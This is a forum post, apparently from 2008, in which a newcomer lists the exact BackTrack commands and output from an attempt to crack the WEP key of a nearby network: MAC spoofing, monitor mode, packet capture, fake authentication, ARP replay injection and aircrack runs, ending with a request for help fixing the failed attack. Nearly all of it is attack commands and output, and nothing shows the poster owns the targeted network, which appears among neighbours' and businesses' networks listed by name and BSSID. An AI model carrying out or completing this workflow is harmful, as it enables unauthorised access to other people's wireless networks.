Hello, I just bought an Alfa-AWUS036H and its a really big improvment, now I can see 12 networks in my area, before ... only 4
I'm new in Linux and I followed a method to find a wep password but I couldn't start injection to receive something.
I received ... nothing
Below you can see exactly what I've done and I noted every step to be easier for me :



STEP 1:

bt ~ # airmon-ng

STEP 2:

Interface Chipset Driver

wlan0 RTL8187 r8187

t ~ # airmon-ng stop wlan0

STEP 3:

Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode disabled)

bt ~ # macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:c0:ca:1b:5f:3e (Alfa, Inc.)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
bt ~ #

STEP 4:

bt ~ # airmon-ng start wlan0


Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode enabled)

STEP 5:

bt ~ #airodump-ng wlan0

CH 2 ][ Elapsed: 52 s ][ 2008-06-27 10:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:C7:1F:46:E1 58 111 0 0 6 54. WEP WEP 2WIRE328
00:04:E2:4E:89:1E 58 58 22 2 1 11 OPN default
00:1D:7E:1F:3D:8B 44 55 0 0 11 48 OPN linksys
00:181:A2:20:08 41 28 0 0 11 54. WEP WEP Grillo's
00:13:46:4A:CC:20 39 36 0 0 6 54. OPN Black Diamond Hotel
00:0C:41:27:94:48 30 29 0 0 6 11 WEP WEP terracotta
00:1B:5B:27:B8:71 28 7 0 0 6 54. WEP WEP Jacobs

BSSID STATION PWR Rate Lost Packets Probes

00:04:E2:4E:89:1E 00:1B:77:60:EF:85 75 0- 1 0 14 default
00:1D:7E:1F:3D:8B 00:20:00:03:AF:2D 50 0- 1 46 262 linksys

bt ~ #

STEP6:

bt ~ # airodump-ng -c 6 -w wep123 --bssid 00:1E:C7:1F:46:E1 wlan0


CH 6 ][ Elapsed: 40 s ][ 2008-06-27 10:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:C7:1F:46:E1 100 96 351 0 0 6 54. WEP WEP 2WIRE328

BSSID STATION PWR Rate Lost Packets Probes

STEP 7:

bt ~ #
bt ~ # aireplay-ng -1 0 -a 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 -e 2wire328 wlan0
10:35:22 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6

10:35:22 Sending Authentication Request (Open System) [ACK]
10:35:22 Authentication successful
10:35:22 Sending Association Request [ACK]

STEP 8:

bt ~ # aireplay-ng -3 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
10:37:31 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6
Saving ARP requests in replay_arp-0627-103731.cap
You should also start airodump-ng to capture replies.
Read 15230 packets (got 0 ARP requests and 24 ACKs), sent 0 packets...(0 pps)
bt ~ #

STEP 9:
NOW I CHECK INJECTION:

bt ~ # aireplay-ng -9 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
10:42:19 Trying broadcast probe requests...
10:42:19 Injection is working!
10:42:21 Found 5 APs

10:42:21 Trying directed probe requests...
10:42:21 00:1E:C7:1F:46:E1 - channel: 6 - '2WIRE328'
10:42:26 Ping (min/avg/max): 0.092ms/142.687ms/196.018ms Power: 100.00
10:42:26 25/30: 83%

10:42:26 00:13:46:4A:CC:20 - channel: 6 - 'Black Diamond Hotel'
10:42:28 Ping (min/avg/max): 15.992ms/61.595ms/148.001ms Power: 35.87
10:42:28 30/30: 100%

10:42:28 00:1B:5B:27:B8:71 - channel: 6 - 'Jacobs'
10:42:34 Ping (min/avg/max): 11.996ms/35.988ms/51.994ms Power: 23.83
10:42:34 6/30: 20%

10:42:34 00:0C:41:27:94:48 - channel: 6 - 'terracotta'
10:42:35 Ping (min/avg/max): 0.012ms/40.395ms/55.997ms Power: 29.00
10:42:35 30/30: 100%

10:42:35 00:1E:C7:E1:FA:71 - channel: 6 - 'SHAY'S Tack&Feed'
10:42:38 Ping (min/avg/max): 23.992ms/66.398ms/107.993ms Power: 26.80
10:42:38 30/30: 100%

bt ~ #

STEP 10:

bt ~ # aircrack-ng -n -64 -b 00:1E:C7:1F:46:E1 wep123-01.cap
Invalid WEP key length. [64,128,152,256,512]
"aircrack-ng --help" for help.
bt ~ #
bt ~ # aircrack-ng -n -128 -b 00:1E:C7:1F:46:E1 wep123-01.cap
Invalid WEP key length. [64,128,152,256,512]
"aircrack-ng --help" for help.
bt ~ #

So, no injection (in step 8) to receive something but when I tested injection (step 9) to every network it looked to work ...
Its very weird for me ... obviously , because its a new world for me ... )
Please, give me an advice and tell me what I typed wrong. I think I need some special commands for this wireless card.

Thank you